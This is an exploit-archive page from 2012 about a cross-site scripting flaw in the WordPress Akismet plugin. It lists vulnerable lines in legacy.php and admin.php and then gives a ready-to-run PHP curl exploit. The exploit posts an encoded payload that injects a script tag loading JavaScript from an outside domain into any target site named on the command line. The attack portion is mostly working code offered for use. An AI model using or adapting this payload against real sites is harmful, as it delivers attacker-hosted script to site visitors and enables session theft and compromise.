Home / exploitsPDF  

WordPress Akismet Cross Site Scripting

Posted on 03 October 2012

#########################################################
Exploit Title : Wordpress Akismet Cross-Site Scripting
Author : Nafsh
Discovered By : Tapco Security & Research Lab
Date : 2 Oct 2012
Home : http://Sec-Lab.Tap-Co.Net
Contact : Nafsh.Hack@Gmail.com
#########################################################
Source : http://wordpress.org/extend/plugins/akismet

Vulnerability is also triggered in: /wp-content/plugins/akismet/legacy.php

akismet_caught() is called.
231: echo echo attribute_escape($_POST['s']); // legacy.php

requires:
162: if(0 == $spam_count) else
228: if($comments)
231: if(isset($_POST['s']))
54: function akismet_caught()

Vulnerability is also triggered in: /wp-content/plugins/akismet/admin.php

akismet_add_comment_author_url() is called.
773: print print (wp_update_comment($comment)); // admin.php
771: $comment['comment_author_url'] = esc_url($_POST['url']); // admin.php

requires:
767: if(!empty($_POST['id']) && !empty($_POST['url']) &&
check_admin_referer('comment_author_url_nonce'))
770: if(current_user_can('edit_comment', $comment['comment_ID']))
766: function akismet_add_comment_author_url()
#########################################################
exploit :
#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#

//
// HTTP POST,
//

$target = $argv[1];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>
#########################################################
We are : K0242 | Nafsh | Ehram.shahmohamadi
#########################################################
Tnx : Am!r | M.R.S.CO All Members In Www.IrIsT.Ir & Www.IdC-TeAm.NeT
#########################################################
Greetz : All sec-lab researchers

 

TOP

Malware :

Exploits :